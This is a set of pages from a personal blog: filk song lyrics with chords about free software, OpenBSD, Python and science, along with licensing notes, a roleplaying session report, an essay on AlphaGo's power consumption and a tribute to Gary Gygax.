Songtext for printing and passing on: pdf | odt (source) | txt
Audio-files: ogg | mp3
This recording is part of the music podcast singing in the winds of time.

==== Infinite Hands ====

C        a             D           a
Infinite Hands build a world to be free, 
    E       G            a
the digital space we all know, 
   C      (a)         D            a
unlimited use has the code that we write, 
    C             G            a
and freedom's the badge we all show.

     C                           D           a
The stuff runs our servers, our desktops and grids, 
     D                    a
by uncounted hands it was made, 
     a                     D         a
set out in the wild on the day it is born, 
        C             D           a
for our free running, long coding trade. 

Ref: 
    C             a          D           a
And no law shall bind us or keep us for long, 
       E       G                    a
for infinity's ours and infinity's free, 
     C          a           D             a
and no country owns us, and no land's our own, 
    C         G        a
for Infinite Hands are we. 

The companies thought that they'd pay us for lines, 
and have all the code for their own. 
"You're company people and company teams, 
your code will now serve us alone."

R.Stallman was only a student that day, 
and he said to himself, thinking deep: 
Farewell to a job, all my code shall be free, 
for what they don't own, they can't keep. 

-Ref-

The miracle came, he did not change his mind
and gathered around him a crew, 
and people could buy his free programs from him, 
sent by mail and his money got through. 

At times others came and they said, "We're free, too, 
you can take code as if in a mall. 
It will be only yours then, just say it's from us, 
and it runs and compiles where you call."

-Ref: But... -

Now Richard M. Stallman was vexed and annoyed, 
and he sent out the word as before: 
"All code must be free, free to use and improve, 
which our license ensures evermore."

But still many coders were lured from our ranks, 
Now for Windows and Apple they strived, 
- spoken in background: And for Amiga, BeOS, IBM, 
    and many more -
their doom and their fall came from finland one day, 
as to GNU a free kernel arrived.

-Ref-

"Come all to U.S.", came a call spreading wide, 
"for there is no place else you can be."
 - spoken in background: DMCA, DRM, TCPA, 
    software patents, idea patents and a war on terror - 
But Richard M. Stallman still sent out the word, 
that all code from now on must be free. 

So code would stay free and our teams did grow strong, 
but some loopholes remained in our side, 
which traitors like TiVo exploited to steal, 
so we needed a change in the right. 

- Ref-

... no words ... 

So our license reshaped by the people and GNU, 
for code contributed to trade, 
And orders be none to withhold us or bind, 
    C                       E          a
No law on our code but the license we made. 

Ref: 
      C             a           D           a
Just that law shall bind us and keep us for long, 
       E       G                   a
for infinity's ours and infinity's free, 
    C          a            D             a
and no country owns us, and no land's our own, 
    C        G               a
for Infinite Hands/Lines are we. 
    C       E        C           (G) a
are we, for Infinite Hands/Lines are we. 

Background:
This is a part of the story of free software, although it misses some details. While "Finity's End" was a work of fiction (the book is avaible on amazon.com, amazon.de and maybe at bookzilla.de), this story really happened and happens today.
For additional information please refer to GNU.

Licensing:
This song is free art avaible under the following four licenses (for details, please visit draketo.de/licenses). Permission to filk her work freely was granted by Leslie Fish (cite: "Anything to keep the internet free: Go for it!" - she's great! - maybe you'd like to listen in on her music?) and CJ Cherryh.

- GNU FDL
- GPLv2 or later or GPLv3 or later
- Art Libre v1.3 or later
- Lizenz für freie Inhalte v1.0 webstar

You can use any of those four licenses, because I can't yet know which license will make it to the general license for free art. Please keep all four licenses when you make changes, so we avoid licensing chaos. It doesn't use creative commons licensing, because cc does not protect the free avaibility of the sources (Just think LaTeX and pdf).
Sources: infinite-hands.draketo.de

It was written by Draketo aka Arne Babenhauserheide, finished on 2007-09-28, improved by Alan Thiesen 2007-10-08.
Copyright © 2007 Arne Babenhauserheide.
It's first public performance was at FilkCONtinental2007 (A filk convention on the Freusburg in Germany)

Missing topics: DRM, SCO, Open Source – I'd be glad to get suggestions from you! ( just use the comment field )

Arne Babenhauserheide
Visitors for infinite-hands since 2008-04-17
People visited Infinite Hands since 2008-04-17
AnhangGröße
Infinite-Hands--free-software.ogg3.62 MB
Infinite Hands.odt15.26 KB
Infinite Hands.pdf89.37 KB
Infinite Hands.txt3.53 KB
Infinite-Hands--free-software.mp34.86 MB

Infinite Hands draft with Bodhran and Flute

A rough draft of Infinite Hands with additional instruments.

The Flute and Bodhran tracks are improvised on the spot and recorded yesterday in one go, so they are a bit rough :)

Also the vocals are finally up to date with the text.

I hope you enjoy it!

download

For more Information on the song, see infinite-hands.draketo.de.

If you want to dabble with the recording yourself, just grab the multitrack audacity-source.

And if you like the song, why don’t you flattr it?

Infinite Hands (Remastered Version)

Merlin remastered Infinite Hands with Bodhran and Flute. This is a copy of his text (in German).

Basierend auf dem Draft with Bodhran and Flute von Drak's Song "Infinite Hands" habe ich mal mit dem Audacity-Projekt gedaddelt, da mir die Flute zu laut war und teils unangenehm war (besonders bei höheren Tönen).

Welche Änderungen ich genau gemacht habe, steht im README-File meines Git/Mercurial - Projektes.

Git:

Mercurial:

Enthalten sind Songtext, das originale Audacity-Projekt von Drak, und meine Version in sowohl MP3 als auch OGG.

Morning has broken

Morning has broken
        beyond repair

the words are spoken
        now do you dare

to absolve of the error made
or will you die in your own shade?

New Horizons for Science

Farewell to friends -- and a love.

Download: mp3 audio | webm video; Watch on youtube

New recording 2019 at Intermezzo with Rika Körte and Steven Macdonald as recording engineers: mp3 audio


- PDF -

FilkTeX

Goodbye my love, I leave tonight,
I know you’re in new hands,
Though I would rather follow you,
That’s not the way that this is planned,
Our destiny will now be watched
by different eyes than mine,
I wish you just the best,
be sure we’ll meet again in time.

By now you’ve found somebody else,
to watch out over you,
Every new face I see wasted here,
it’s breaking me in two,
Maybe I should stay and fight
but my heart calls me away,
To that call I must be true,
you know, that is a father’s way.

I decided long ago,
about the way I feel for you,
but it has made no difference,
they are breaking you in two,
it’s true I swore me to your side,
come sunshine or come snow,
But as your faithful friend
I know, it’s time for me to go.

So goodbye to all the friends I’ve made
I’ll never be too far,
there’s much that I have learned from you,
of gluon, mind and star,
I’m grateful for the times we spent,
and all that we’ve been through,
the place I reached today,
I reached because of you.

Goodbye my love, scientia,
should I one day return,
I’ll no longer be a funds-beggar,
and then the tide will turn,
I know you love me as a friend,
but that’s not enough for me,
your paradigms I’ll shift, and then,
we’ll have a chance, you’ll see.

Copyright © 2017 Filk by Arne Babenhauserheide, License: cc by.
Music and original lyrics: Katja Buchmüller

A Filk on the Filk Song New Horizons by Katja Buchmüller. Recorded when I played it for the SAT group at IMK-ASF, KIT, after I signed my contract to move from science to software development .

The embedded video is compressed down to 5.6 MiB (thanks to awesome vp9 compression), so it’s suitable to be sent by email: new-horizons-for-science.webm

When you send it by email, your recipients might need a web browser to play it (until desktop video players catch up with the new video codecs on the web).

For more on science, see the Science-category page and especially Information challenges for scientific publishing, and counting scientific publications as metric for scientific quality is dumb, as well as propagating changes.

And if you enjoy this song in the EU, please tell your representatives before June 20 2018 to stop the bad parts of the copyright reform, so I can continue to do scientific work in my free time without having to work at a university. One major part of this is Article 13, which would require establishing upload filters for social media sites — and might have stopped me from sharing this song there, if it were the law today.

Update: We lost that in general, but legal battles. There’s quite a bit of research I now cannot do while those who just don’t care continue to collect whatever they want. I’m sorry for that. The EU Copyright Reform threatens my ability to do research in my free time, now that I left university to offer a future for my children. So please help keeping links free (stop Article 11), data mining for independent researchers legal (stop Article 3), and automatic upload filters non-mandatory (stop Article 13).

AnhangGröße
2017-10-11-new-horizons-for-science-im-IMK-ASF-KIT-filk-song-arne-babenhauserheide-based-on-new-horizons-IMG_2297-vp9.mp31.17 MB
2017-10-11-new-horizons-for-science-im-IMK-ASF-KIT-filk-song-arne-babenhauserheide-based-on-new-horizons-IMG_2297-vp9.webm5.37 MB
new-horizons-science.flk2.32 KB
new-horizons-science.pdf52.73 KB
new-horizons-science.png24.39 KB
new-horizons-for-science-intermezzo.mp32.98 MB

Pond-erosa Puff (OpenBSD)

I recently found the OpenBSD songs, and the artists say that they are part of OpenBSD, logically as well as license-wise. And OpenBSD is licensed under a three-clause BSD license which is GPL compatible - that means I can record and publish it here!

This is the OpenBSD 3.6 release song: Pond-erosa Puff, written about people who make something free and suddenly decide to go the unfree path.

Many thanks to all you OpenBSD guys!
Your license is a bit too weak for my taste, but damn, it's free - and your code is as good as your songs!

Audio-files: ogg | mp3

This recording is part of the music podcast singing in the winds of time.

My recording is far from perfect, but I hope you enjoy it anyway! Also it should give everyone a good headstart who always wanted to play the song on the guitar. Oh, and please do listen to the ogg vorbis file. It sounds far better! - Draketo

Pond-erosa Puff (from Ty Semaka)


Well he rode from the ocean far upstream
Nuthin' to his name but a code and a dream
Lookin' for the legendary inland sea
Where the water was deep n' clean n' free

But the town he found had suffered a blow
Fish were dying, cause the water was low
Fat cat fish name o' Diamond Dawes
Plugged the stream with copyright laws

He said my water's good n' my water's free
So Pond-erosa, you gonna thank me!
Then he bottled it up and he labeled it "Mine"
They opened n' poured, but they ran outta time!

So Puff made a brand and he tanned his hide
Said. "this is the mark of too much pride"
Tied him to a horse, set the tail on fire
Slapped er on the ass and the water went higher!

Pond-erosa Puff
wouldn't take no guff
Water oughta be clean and free
So he fought the fight
and he set things right
With his OpenBSD

Well things were good fer a spell in town
But then one day, dang water turned brown
Comin' to the rescue, Mayor Reed
He said, "This here filter's all ya'll need"

But it didn't take long 'fore the filter plugged
Full of mud, n' crud, n' bugs
Folks said "gotta be a gooder way"
Mayor said "Hell No! She's O.K."

"The water's fine on the Open range"
And he passed a law that it couldn't change.
"No freeze, no boil, no frolicking young"
Puff took him aside, said "this is wrong"

Then he found the Mayor was addin' the crud!
So he took him down in a cloud of blood
Said "The Mayor's learnd, he's done been mean"
So they did it right and the water went clean!

CHORUS

So once agin' it was right, but then
The lake went dry, she was gone again!
Fish started flippin' and floppin' about
Yellin' "Mercy Puff! It's a doggone drought!"

So he rolled up-gulch till he hit the lake
Of Apache fish, they was on the take
They'd built a dam that was made of rules
Now Puff was pissed and he lost his cool!

I'm sick and tired of these goldarn words!
n' laws n' bureaucratic nerds!
You're full o' beans n' killin' my town
and if you's all don't shut er down

I'll hang a lickin' on every one
of you sons o' bitchin' greedy scum!
So he blew the dam, an' he let 'er haul
Cause water oughta be free for all!

CHORUS


License: The text is licensed under a 3 clause BSD license, the recording can be used under the usual free licenses and additionally under the 3 clause BSD license (the license doesn't enforce that, but I feel that it's just the right thing to do).

AnhangGröße
Pond-erosa-puff.ogg3.41 MB
Pond-erosa-puff.mp34.51 MB

Realistically Me (the square root)

-Melodie partly from "Swing low, sweet chariot"-

He looked over squares, and what did he see?
coming just for driving him mad,
The rational numbers didn't fit for me,
coming just for driving him mad.

He looked over pentagrams, and what did he see?
coming just for driving him mad,
There was funny looking a cousin of me,
coming just for driving him mad.

He told his pupils, all the world is a number,
coming just for driving him mad,
And one of them said: "this one makes me wonder"
coming just for driving him mad,

He told him of me, and to his growing dread,
coming just for driving him mad,
He proved my being, and what did he get,
Pytagoras just wanted him dead.

I'm the square root,
The funny square root,
gave him a bad mood,
Just me, the square root,
And everything in me is good!

(being irrational can be great! :-) )

Seiken Densetsu 3 Bardstale

The introduction story of Angela from the SNES-Game Seiken Densetsu 3 (SD3) which you play when you start the game with her as main character, done in song-form. Infos about her and about that game: http://www.fantasyanime.com/mana/som2char_2.htm

This is the first song I ever wrote myself, text melody and guitar, and I am still not quite satisfied with the way I can play it.


-> ogg vorbis music file.

It misses a violin. (I played it once together with a fiddler, and it was exactly what I imagined. But I had no recording accessories at hand at that time, and I'm sad we weren't able to play together more often... I hope you still like it the way it is now!)

Songtext and chords:

SD3 Bardstale Chordsheet
Chord Sheet (PDF)

Seiken Densetsu 3 Bardstale

Chords:

D A E G
D A C G

Ref: d a d a
d a C G

The power of the magic, the magic of the spell,
brought her out of danger, brought her out of hell.
Beauty in her eyes and beauty in her face,
magic in her heart, but no magic in the mind.

Her mother was against her, the queen of the castle,
crying out for power, for power to prevail.

Ref: Lonely girl, beautiful girl, arrogant girl with magic in her heart.

Her queen needed a life, taken away from a human,
tried to take another, another than her own,
Her kingdom was freezing, the mana was fading,
by fleeing her mother, she finally ran away.

Ref: Lonely girl, beautiful girl, arrogant girl with magic in her heart.

Carried by the magic, the magic in her heart,
safe from the grip of her mothers magic hands,
Alone in the cold, but living at least,
she awoke outside the castle and ask'd her where to go.

- New Chords: -
- d a e a -
- a C G a -

Slowly she walked south to be attacked by fierce fiends,
after the victory the cold took her in its hands.

- d C a -
- Strummed: D A E G -

She awoke in the bed of an all unknown house,
selfishly stepping out without a thank you.

AnhangGröße
seiken-densetsu-3-bardstale.ogg3.39 MB
seiken3.pdf72.21 KB
seiken3-thumb-310x438.png48.29 KB

Soul of Wind

To the melody of Firesoul by Aryana. Text written around 2007 by Draketo (Arne Babenhauserheide).

  e                           G
I dance with the wind, for my soul needs to fly,  
  a                e             D
I move through the storm just to look at the sky  
  e                      D           e
I stay of my own will, I need to fly free,  
    a            e           D           e
and just one can bind me and that one is me.

I crave for the gusts, the wind on my wings,
In flight there’s no border, no queens and no kings,
I go where I want and you can’t keep me in,
I need to stay moving, leave friends and leave kin.

I know where I’m going, I’ve chosen my way,
Must heed only myself, whatever you say,
Don’t mourn for my passing, we might meet again,
just savor each moment, for struggling’s in vain.

My power is freedom, my path is my own,
If no one is near, I will walk it alone,
For only that way I have power to fly
so don’t ever bind me or else I will die.

I dance with the wind, for my soul needs to fly,
I move through the storm just to look at the sky
I stay of my own will, I need to fly free,
and just one can bind me and that one is me.

PS: And bind me I did. See Storm through Rock.

Storm through Rock

To the melody of Firesoul by Aryana. Text written 2016 by Draketo (Arne Babenhauserheide). A filk on Soul of Wind, for life is change and change reflects in living songs.

  e                        G
I sigh in the wind, for my soul wants to fly,  
   a                e             D
to wing through the storm just to look at the sky  
  e                        D           e
but choices are made and I stand by my word,
    a             e       D         e
and don’t care if anyone but me has heard.

I move on my path, I’ve chosen my way,
each crossing takes possible futures away,
but never to choose just worsens my need,
and a choice fast retracted does not make a street.

I love stories of choices which people take far,
but most stories show people who will find a star,
so they don’t show which hardships can happiness bring,
or the mission you choose for yourself with a ring.

I now find little freedom in paths without aim,
I’m older, I’m stronger, I’ve chosen my game,
children ask others, that’s not my concern,
I’m walking my path and its harvest I’ll earn.

Freedom is different when some ways I block,
For wind to play music, you guide it through rock,
A storm roaming freely gains strength through the sun,
where channelled through mountains it’s yielding to none.

My power is freedom, my path is my own,
with friends walking near, I am never alone,
for humans need kinship for strength to survive,
knowing you all helps my dreaming to thrive.

For in this special weekend where freedom I live,
I gain strength from fire and healing I give,
from all of your voices, your friendship and dreams,
for something like joy means much more than it seems.

The truth is in there - Maxwell gives us the speed of light

- a Filk on "X as in Fox" by Cecilia Eng -

Once we believed in the speed of the light,
and experiments show that what we thought is right,
But we search our math for another sight,

'Cause we hope that the truth is in there.

When we measure the speed of something somehow,
we can only check against the distance, but now
we'll show that we get it from Maxwell', and wow!

We will know that the truth is in there!

First we take a sheet of charge at hand,
then we move it by an unseen command,
and nabla rot B shows the field where we stand,

And we know that the truth is in there.

Now that formula says, our field's everywhere,
when about the electrics we never care,
but that can't be true, for our world's still there,

And we know that the truth is in there.

Since nabla rot E is -dB/dt,
a field can never change at once all that we see,
It takes some time, which gives us the v,

And we guess that the truth is in there.

So now we take a small square far from the sheet,
when we check the change in B, it then shows quite neat,
It is width times the speed times B, which we need,

To see that the truth is in there.

For we also know that an electric field,
round a loop is (as Stokes will quickly yield),
Just the length of the loop times the strength of the field,

That's a clue that the truth is in there.

For now we take both and make the loop small,
so the length in a field is its width, and we call,
"E is v times B", which gives us all

To believe that the truth is in there.

We then do the same for nabla rot B,
But there's a c squared so we easily see,
E is also c squared times (B divided by v),

And we see that the truth is in there.

For with these we can easily tell,
that v must be c which we like so damn well,
For now we are sure we're right when we yell,

We know that the truth is in there!

So what do we know from this funny tale?
The strength of the fields leads us through the veil,
and gives us the speed of light without fail,

So we see that the truth is in there!

Now we only need to measure the attraction of charge,
and then the attraction of flowing charge,
and the root of their quotient might be quite large,

But it gives us the truth that's in there.
The invariant truth that's in there.


Jepp, that's a way to get the speed of light from the Maxwell equations and the knowledge that our world still exists :)

I hope you enjoyed reading the song as much as I enjoyed writing it!

Volkoi

There’s music in their stamping,
in their shouting to above,

There’s rhythm in their live,
in fight and death and love,

(There's rhythm in their stance,
in strike and blow and bluff,)

Where nobler people seek the truth
and never find their hearts,

A Volkoi’s always on his toes,
when the music starts.

— Eschrandar, Nayan War Engine, Mechanical Dreams (sadly only the store is left of this great game…)

With Python from the Shadows

- Written by Draketo aka Arne Babenhauserheide, originally to the melody of Moonlight Shadow on 22.2.08 but switched on 2008-06-27 to be able to put a recording under free licenses -


Audio-files: ogg
This recording is part of the music podcast singing in the winds of time.

With Python from the Shadows

First time ever I saw it,
carried away by its lightweight structure,
My heart grew fuzzy and sunlit,
carried away by its lightweight structure,

All I saw was the relevant part,
deep inside every programs core,
It flowed like my thoughts but it looked like art,
So clear that at once I saw through.

-

The bridge of doom I was then crossing,
carried away by its lightweight structure,
The guardsman into darkness tossing,
carried away by its lightweight structure,

( "What is the fastest way to store a list of unicode chars?"
"A mutable or an immutable list?"
"I don't know... Aaaargh!" )

It's a month now since I passed that whitening guard,
deep inside every programs core,
To know what I want is the hardest part,
since the code I can simply see through.

-

Ref: I chime, I rime, see you with Python all the time,
I chime, I rime, see you with Python, next time.

-

Four a.m. in the morning,
carried away by its lightweight structure,
you can see my fingers are still coding,
carried away by its lightweight structure,

All it takes is an idea in me,
For stuff inside any programs core,
And the code flows freely for my mindview to see,
So clear that at once I see through.

-

- Ref -

-

mmmmmmm
carried away by its lightweight structure,
mmmmmmm
carried away by its lightweight structure,

I write too late, even typing grows hard,
mmmmmmm
The night is heavy and my lids will not part,
but my mind can still simply see through.

AnhangGröße
with-python-from-the-shadows-own-melody.ogg1.35 MB
With Python from the Shadows-with-chords.txt2.59 KB

Broken Apple Heart - Why I'm a Mac user no more

Beware of that Fruit (Broken Apple Heart) ( http://bah.draketo.de/?p=13 )

(What do you think, why Macs no longer Smile?)

Chorus: I was an Apple User and loyal to the core,
But one grey day I realized what made my heartache soar,
They want to make the big bucks now and want no one to see,
That ever more surveillance takes the Users rights as fee.

I was a little Bugger, when I saw the first of Mac,
Discovered there then Shufflepuck and all the time came back,
It belonged to parents friends then, but my will it showed its grip,
And when they tried to take “My Mac”, their efforts meant a zip.

My third Mac, it was bigger, not so cute, but lovely, too,
And to my greatest pleasure, I owned the smiling goo,
I was a big fanatic, Apple was it all the time,
And when I got to talking, all my friends could do was wine.

Then came the time of MacOSX, it was the thing for me,
The beta was the slowest beast, but with it I felt free,
I worked and it grew faster and I never bid the time,
And every single Update pushed the speed another line.

But then they made the panther and it hated my old Mac,
And though I bought a new one, my belief did not come back,
Then came OSX on intel, my belief lost every race,
Apple takes “trusted computing”, hits me squarely in the face.

Now my Mac here owns a Linux and Apple makes no gain,
Since for my precious income I want freedom and no chain,
So I switch on to a Linux, MacOSX I use the least,
with those lovely little penguins I take midsummers feast.

Some days Im feeling sad and my parting brings me pain,
But without freedom for their Users, all their genius is in vain,
When I’d come back to Apple, I will tell them with delight,
To get me back they must adhere to freedom and my rights,
They must adhere to freedom and to every Users rights.


Dear Steve Jobs,

I once left Apple after a Life of using Macs because you included the TPM chip in the Intel Macs, and I’ve been an active opponent to Apple ever since, because DRM and Trusted Computing aka Treacherous Computing go against everything I believe right in informatics and you had just made Apple the spearhead of DRM.

I’m not likely return as user (I’ve grown too fond of KDE for that), but I am likely to return as supporter, if you decide to give back the rights of your users to manage their own computers freely.

DRM takes away freedom from users, and I can’t support anybody who takes the freedom of people to turn it into profit. You have the option now, to shape Apple into a “good guy” again, and I urge you with all my heart to do it. You broke my heart in the past, but you might be on the way to mend it… and until you do so, I’m going to sing the song into which I shaped my pain back then:

A GNU Head, redrawn

For my new Neo-Keyboard I wanted the GNU head from GNU and the plussy from FSFE on the meta/super keys (those which often have a Fenster-Logo). Sadly the normal GNU head did not work very well with the Laser from Schubi, so I grabbed my tablet, fired up mypaint and created a new one, building on the old, but adding more contrast and stronger lines. I hope you like it!

A GNU head, redrawn

A GNU head, redrawn

See the attachments for other versions, OpenRaster and SVG source.

And if you like it, please leave a comment!

PS: And my spacebar says “Infinity’s ours and infinity’s free”! *happy*

AnhangGröße
a-gnu-head-redrawn-clean.png67.24 KB
a-gnu-head-redrawn.png446.15 KB
a-gnu-head-redrawn.ora1.4 MB
a-gnu-head-redrawn-clean.svgz21.67 KB
a-gnu-head-redrawn-clean-simplified.png14.27 KB
a-gnu-head-redrawn-clean-simplified.svgz6.03 KB
a-gnu-head-redrawn-clean.ora1.52 MB
a-gnu-head-redrawn-clean-small.png27.9 KB

A roleplaying easter holiday 2011

We played Exalted sunday morning, slaying a second circle demon before nightfall, and Dresden Files (FATE) till 2 o'clock in the night. We had a cross in the room, though: It was screwed tightly into the wall, so we could not get rid of it without damaging the wall, so it stayed there…

Well, playing solar and lunar exalted (warriors of the gods) and a renegate dragonblooded (normally weaker exalted, but slayers of solars and lunas, because those are prone to go mad) and burning glowing pillars of light into the night sky after finishing off the bambi-faced, brown-skinned, fan-armed demon directly after she was reborn from hell might account as serving the gods, don’t you think ;)

Seeing my characters mother dead on the field of battle was a major blow, though. She died in this battle because I betrayed my kin to help the solar, who had become my friend before his exaltation and whom I had been sent to kill. My family was disgraced, so it is my fault that she got sent on this mission against a huge demon. I removed her armor and burned her in my anima’s fire on a funeral pyre made from her 11 dead companions in full armor. When nothing was left but the dark-red glowing armor of her companions, I took her armor and moved back to the tavern where we had lived, while the other exalted where invited to a huge festival given by tale spinner and dream weaver, two of the towns three most powerful gods.

… [snipped reply] …

@Anonymous This is not about pixels. We play Pen-and-Paper, so we sit around the table and spin the tale ourselves. 12 people in two groups, 2 game masters, 5 players each. The game masters describe the world and we describe what we do and act out what our characters say - like improvisation theater with self-created characters and longer play-time; and more creative worlds, since we don’t need to show the worlds to anyone else: They only need to be alive in our own heads.

But yes: I burned in passionate anger myself, when I saw my mother dead on the battlefield. And when we shouted at each other when talking about the best strategy, our emotions flared up - after making sure that it’s OK for everyone who was involved in the shouting to let them flare up. You can live the emotions of your character and know that they are from your character - and even though you were close from slitting each others throats (“I throw my swords on the ground and call up to you: ‘I betrayed my own kin to save your damn live! Don’t you throw it away now! Calling our enemies to us is idiocy!’” - Chireka, renegate dragonblooded, to Bright Arrow, dawn-caste solar exalted).

That’s better than anything you can experience in the movies or in books, because it is you experiencing it and acting it out and deciding what you do. And the one I shouted with and me really enjoyed ourselves doing so: Our eyes glowed brightly when we talked about it afterwards: The intensity was awesome: „Chireka so wants to kill your character - that was great!“

The game master asked me afterwards about the death of my mother if that wasn’t over the top, but I could wholeheartedly deny that: It was exactly the right thing to make my character burn with anger in the final battle. And as fire aspected dragonblooded that meant that she literally burned.

The only problem we have now is that Chireka is not that sure anymore if betraying her kin to save the solar was the right thing to do. But that is a tale for another day :)

The important point is: Even though you live your character while you play, it’s still just description and numbers on a piece of paper, just like characters in a book. When the play is finished, the character becomes a treasured memory, like other heroes of fiction do - but you know that it was you who created him/her/it, and you shared a part of his/her/its life for a few hours.

PS: The rules of the game create a safety net against submerging completely: When your character acts to change something, you roll dice to see what happens, so there is always a level of abstraction behind which you can step, if the intensity grows too high - just like you can take a break when reading a book or watching a video-tape.

PPS: On Friday and Saturday we played Werewolf; the easter roleplaying weekend is our yearly “Extremspielwochenende”. I wrote this post as reply in Freenet (Sone) to what we did on the easter sunday.

AlphaGo uses more power than 3000 humans

Update 2017-11: Alpha Go Zero consumes just about 1-2 kW. I definitely underestimated the speed of development — by around factor 20. Alpha Go Zero only consumes as much energy as 10-20 humans.

Update 2017: OpenAI used a single machine to beat a Dota champion → DENDI 1v1 vs BOT AI - TI7 DOTA 2. I may be underestimating the speed of development.

AlphaGo recently defeated the world Go champion. Go was thought to be unbeatable for computers, but machine learning cracked it.

This year, AlphaGo will challenge multiple players — and support players at the Future of Go Summit in Wuzhen, China. It seems humans are completely outpaced.

Mind the energy consumption

But when you think about the games, keep in mind that AlphaGo likely uses several Kilowatt of energy: According to Wikipedia it had around 2000 CPUs and 250 GPUs when it played against Lee Sedol, each likely taking more than 300W of electricity. On top of that it used millions of simulated training games to sharpen its skills.

Humans on the other hand have around 100W of power (and can’t easily charge up), with only about 30W of that available to power their brains. Even when counting only the GPUs, AlphaGo has a higher power consumption than 3000 humans. That’s more power consumption than all professional Go players together (around 1000).

Learning from AlphaGo?

Also Brady Daniels showed on youtube how he considers the games of AlphaGo to be pretty easy to understand (but hard to beat), while the article about the Go Summit in Wuzhen quoted players who said that seeing AlphaGo win was liberating: They dared to try new moves.

And this might actually have pretty plausible1 explanations: Different from humans, AlphaGo could play millions of death matches — against itself. The equivalent of a street fighter who only fights professionals now and then and could follow up on each fight by train endlessly in real battles to see which of the strategies actually works out in typical battles. Humans just don’t have that much lifetime.

The interesting part you need to keep in mind when you try to learn from AlphaGo: If you try to generalize on this without testing your understanding in real battles, you might built ceremony which looks like AlphaGo but doesn’t work. Essentially Cargo Culting Go.

(It would be interesting whether we could parallelize humans well enough to counter the processing power of AlphaGo with our much lower energy consumption).

»Could every one of us have an AlphaGo?«

To answer this question, we need to look at the energy consumption and the world energy production.

Assuming 2000 CPUs at 300W each, AlphaGo would currenty use 600kW of Energy. With around 3 Terawatt world Electricity generation, the world could keep about 5 million AlphaGo computers running — if we did not need the energy for anything else. That’s only one per 1000 people, one per 100 people if we only run it a few hours per day, and only if all use the same training which gets copied over.

(note that consuming as much energy as 3000 human bodies does not mean that AlphaGo actually costs as much as 3000 skilled human workers, since electrical energy is pretty cheap (600kW likely only cost 600€ per hour, assuming a rate of 0.1ç per kWh, and it’s bound to get cheaper with the switch to renewable energy sources) and food is only a small part of the cost of living in industrialized countries. The minimum subsistence level in Germany only provides 4.40€ for food per day and person, which translates into roughly 50ç per work hour, but due to rent, heating and other expenses, the minimum hourly salary is about 10€, and the cost of highly skilled labor is about 100€ per hour. One AlphaGo needs as much energy as 3000 humans but only costs as much as 6 skilled workers per hour — which is a dilemma for industrialized nations, because the economic incentives do not fit the actual resource consumption).

But if Moore’s Law holds (halving of the energy requirement per computation about every two years), an AlphaGo of 2037 should only require 600W and by 2047 your smartphone should be able to run an AlphaGo. The development speed of computer hardware is awesome (but very expensive).

Algorithmic improvements might make it available far sooner.

Related: Having the power to run 5 million robots with AlphaGo technology who are trained on StarCraft sounds pretty worrying — and might become reality within a few years. The tech for that is being made right now. In case you have a better use in mind: TensorFlow and Sonnet are available as Free Software (not implying that winning in StarCraft is a bad use by itself — it could also serve as training to do desaster aid and similar).


  1. That this sounds plausible does not mean that I’m right. 

Foreign Lands

We will help you, my dear friends,
to bomb and conquer foreign lands,

It won't be attack, nor a sin,
as we will be the ones, who win,

and should someone then criticize,
we'll show our muscles to his eyes,

so never should again he say,
that foreign lands will foreign stay.

Defend ourselves, is what we do,
and our friends defend us, too,

So it's a real honor thing,
that defend bells of yours we'll ring,

whatever is your property,
we'll die for it, as you will see,

and if it's now not one of yours,
soon it will be, we'll help, of course.

-- Your German friends.

Gary Gygax (1938-2008) - he made the world a better place

It's strange to think that Gary Gygax is gone, if only bodily.

Here at germany his creation is fighting a deadly battle with DSA (a german fantasy RPG which came out just after DnD and which raised me to be what I am today), and it's not quite sure which rules they use for that, but it's likely that DSA wouldn't have existed if it hadn't been for DnD setting an example.

And the many roleplaying worlds and systems which sprung into existence after DnD.

I owe many thanks to Gary Gygax, though I only begun playing DnD as one of my rounds about a year before his death.

He was one of the creators of our hobby, and I believe that he not only made our world more fun, but also made it a better place.

I don't believe in a heaven, but he archieved about the most a person can archieve in our world.

And I know that this isn't a normal letter of condolences.
I just can't look at him with regret, now, but only with deep gratitude.

- Arne Babenhauserheide aka Draketo

Tributes by others:

And many more which are gathered at Enworld News who seem to do this gathering far better than I could.

Also an email account was created, to send a letter of condolence without swamping his main mailaccount: http://www.freeyabb.com/phpbb/viewtopic.php?t=4378&mforum=trolllordgames

Licenses

All content of these sites is under free licenses, except where explicitely noted otherwise.

This means you can use my works however you want (even commercially), as long as you allow and enable others (and me) the same with all the works you create from or using parts of my works, and say who created and modified the original works.
The works must stay under the same license(s).

To use them, you can (for example) just put this license text alongside them (i.e. as html page) and create a link pointing to it. Alternatively just put the following at a well-visible position on your creation:

Copyright [YEAR] [your name and other contributors] and [YEAR] Arne Babenhauserheide. Provided under free licenses, including GPLv2 or later, cc BY-SA, GNU FDL without invariant sections, Art Libre and the "Lizenz für Freie Inhalte". Details: http://draketo.de/licenses

More exactly: My works can be used (depending on the type of content) under the following free licenses:

Programs/Applications are only avaible under the GPL, other content under all five licenses.

I keep the right to relicense all content on these sites under other licenses, as long as those other licenses make sure that the "four freedoms" are being kept. If you contribute here, you give me permission to do this.

I use five licenses to avoid walking into a license trap (having all content under a dead license). Please also keep all five licenses when you work with content from these sites.

More detailed info can be found on the german version of this site.

Limitation: Sadly I’m so pragmatic that I’d likely go against these principles if I had to make a living with my creations and would realize that I couldn’t do it while following my principles.

That’s why I’m fighting now for a future in which everyone can make a living with free licensed creations (for example because no one buys unfree works anymore). With this I might be able to allow me - or at least other people in the future - to earn a living in an ethical way.

My Top 20 most popular articles as of 2015

I asked myself: Are the most popular articles on my site the ones I like best?

Here are the top 20 articles from my site, by language and topic:

English:

German:

So my typical reader1 cares about source code management, Emacs, privacy and technical elegance, likes working in a convenient, though nonstandard environmment, does not fall for corporate propaganda, reflects on social interaction and enjoys creative adaption of free software idealism. In case he or she speaks german my typical reader is also interested in questioning what we commonly learn about reality.

And that combination is pretty interesting, so I hope we’ll meet some day ☺.

So, dear typical or non-typical reader: Welcome to my site! ☺ I’m glad you read what I write, and I hope you enjoy it! Please check back from time to time to see what’s new.

PS: Maybe I’ll write some other day what I miss in this list.


  1. The typical reader is a statistical fiction, munged together from many very different groups. Few of you will be exactly like the typical reader. But it’s interesting to investigate anyway. And if you also read the other articles in this list, and they spike your interest, my invention of the typical reader of draketo.de actually brings this typical reader into reality today2. Got you ☺ 

